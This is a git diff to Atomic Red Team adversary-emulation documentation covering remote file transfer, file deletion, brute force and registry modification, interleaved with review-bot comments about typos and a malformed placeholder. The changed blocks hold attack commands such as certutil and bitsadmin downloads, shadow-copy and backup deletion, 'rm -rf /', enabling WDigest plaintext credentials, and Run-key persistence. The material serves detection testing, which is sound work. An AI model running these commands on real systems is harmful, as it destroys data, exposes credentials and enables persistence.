@@ -47,7 +47,9 @@ Utilize rsync to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} ``` @@ -75,7 +77,9 @@ Utilize rsync to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} ``` @@ -103,7 +107,9 @@ Utilize scp to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash scp #{local_file} #{username}@#{remote_host}:#{remote_path} ``` @@ -131,7 +137,9 @@ Utilize scp to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash scp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` @@ -159,7 +167,9 @@ Utilize sftp to perform a remote file copy (push) #### Attack Commands: Run with `bash`! -``` + + +```bash sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ``` @@ -187,7 +197,9 @@ Utilize sftp to perform a remote file copy (pull) #### Attack Commands: Run with `bash`! -``` + + +```bash sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ``` @@ -213,7 +225,9 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} ``` @@ -239,7 +253,9 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify #### Attack Commands: Run with `powershell`! -``` + + +```powershell $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath @@ -271,7 +287,9 @@ This technique is used by Qbot malware to download payloads. #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} ``` 
@@ -298,12 +316,14 @@ This technique is used by multiple adversaries and malware families. #### Attack Commands: Run with `powershell`! -``` + + +```powershell (New-Object System.Net.WebClient).DownloadFile("#{remote_file}", "#{destination_path}") ``` #### Cleanup Commands: -``` +```powershell Remove-Item #{destination_path} -Force -ErrorAction Ignore ``` @@ -327,7 +347,9 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd pushd #{destination_path} echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js CScript.exe AtomicTestT1105.js //E:JScript diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index fb4a7a26..780dada7 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -50,7 +50,9 @@ Delete a single file from the temporary directory #### Attack Commands: Run with `sh`! -``` + + +```sh rm -f #{file_to_delete} ``` @@ -75,7 +77,9 @@ Recursively delete the temporary directory and all files contained within it #### Attack Commands: Run with `sh`! -``` + + +```sh rm -rf #{folder_to_delete} ``` @@ -100,7 +104,9 @@ Use the `shred` command to overwrite the temporary file and then delete it #### Attack Commands: Run with `sh`! -``` + + +```sh shred -u #{file_to_shred} ``` @@ -120,7 +126,9 @@ Delete a single file from the temporary directory using cmd.exe #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd echo "T1107" > %temp%\T1107.txt del /f %temp%\T1107.txt >nul 2>&1 ``` 
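Review bot: the `@@ -327,7 +347,9 @@` hunk in atomics/T1105/T1105.md (OSTap emulation) still carries "specfic" in the hunk-header description and "worms accross network shares" inside the echoed JScript string. Both come from the atomic's YAML, so fixing them there would regenerate cleanly with the new `cmd` fence.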
@@ -141,7 +149,9 @@ Recursively delete the temporary directory and all files contained within it usi #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd mkdir %temp%\T1107 rmdir /s /q %temp%\T1107 ``` @@ -162,7 +172,9 @@ Delete a single file from the temporary directory using Powershell #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item $env:TEMP\T1107.txt Remove-Item -path $env:TEMP\T1107.txt ``` @@ -188,7 +200,9 @@ Recursively delete the temporary directory and all files contained within it usi #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-Item $env:TEMP\T1107 -ItemType Directory Remove-Item -path $env:TEMP\T1107 -recurse ``` @@ -209,7 +223,9 @@ Delete all volume shadow copies with vssadmin.exe #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd vssadmin.exe Delete Shadows /All /Quiet ``` @@ -229,7 +245,9 @@ Delete all volume shadow copies with wmic #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wmic shadowcopy delete ``` @@ -249,7 +267,9 @@ This test leverages `bcdedit` to remove boot-time recovery measures. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no ``` @@ -270,7 +290,9 @@ This test deletes Windows Backup catalogs. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd wbadmin delete catalog -quiet ``` @@ -290,7 +312,9 @@ This test deletes the entire root filesystem of a Linux system. This technique w #### Attack Commands: Run with `bash`! -``` + + +```bash rm -rf / --no-preserve-root > /dev/null 2> /dev/null ``` 
@@ -310,7 +334,9 @@ Delete a single prefetch file. Deletion of prefetch files is a known anti-foren #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0]) ``` @@ -333,7 +359,9 @@ https://twitter.com/SBousseaden/status/1197524463304290305?s=20 #### Attack Commands: Run with `powershell`! -``` + + +```powershell if ($env:os -eq "Windows_NT") { New-Item $env:TEMP\TeamViewer_54.log Remove-Item $env:TEMP\TeamViewer_54.log diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md index 8e501aa0..4d76637e 100644 --- a/atomics/T1110/T1110.md +++ b/atomics/T1110/T1110.md @@ -51,7 +51,9 @@ Creates username and password files then attempts to brute force on remote host #### Attack Commands: Run with `command_prompt`! -``` + + +```cmd net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} echo "1q2w3e4r" >> #{input_file_passwords} diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 69ef8b02..241b152a 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -35,12 +35,14 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f ``` #### Cleanup Commands: -``` +```cmd reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f ``` 
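Review bot: the `@@ -35,12 +35,14 @@` hunk of atomics/T1112/T1112.md has "using reg.exe cia cmd consol" in its header context; this is the atomic's description and should read "via cmd console". Fix in the YAML so the regenerated doc picks it up.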
@@ -60,12 +62,14 @@ CMD is ran as Administrative rights. #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f ``` #### Cleanup Commands: -``` +```cmd reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f ``` @@ -84,7 +88,9 @@ Modify a registry key of each user profile not currently loaded on the machine u #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) $PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$' @@ -155,12 +161,14 @@ Sets registry key that will tell windows to store plaintext passwords (making th #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) -``` + + +```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f ``` #### Cleanup Commands: -``` +```cmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f ``` @@ -186,7 +194,9 @@ Sets Windows Registry key containing base64-encoded PowerShell code. #### Attack Commands: Run with `powershell`! -``` + + +```powershell $OriginalCommand = '#{powershell_command}' $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand) $EncodedCommand =[Convert]::ToBase64String($Bytes) @@ -195,7 +205,7 @@ Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_sto ``` #### Cleanup Commands: -``` +```powershell Remove-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -ErrorAction Ignore ``` 
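Review bot: in the `@@ -60,12 +62,14 @@` hunk of atomics/T1112/T1112.md the newly fenced command writes `/d {some_other_executable}`, which looks like an input argument that lost its leading `#` (`#{some_other_executable}`) and will be stored in the Run key as that literal string. If a literal placeholder is intended, say so in the description; otherwise add it as an input argument. The header context "CMD is ran as Administrative rights" should also read "CMD is run with administrative rights".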
@@ -215,7 +225,9 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris #### Attack Commands: Run with `powershell`! -``` + + +```powershell $key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" $name ="bad-subdomain" new-item $key -Name $name -Force @@ -225,7 +237,7 @@ new-itemproperty $key$name -Name * -Value 2 -Type DWORD; ``` #### Cleanup Commands: -``` +```powershell $key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\" Remove-item $key -Recurse -ErrorAction Ignore ``` @@ -245,12 +257,14 @@ placing javascript in registry for persistence #### Attack Commands: Run with `powershell`! -``` + + +```powershell New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name T1112 -Value "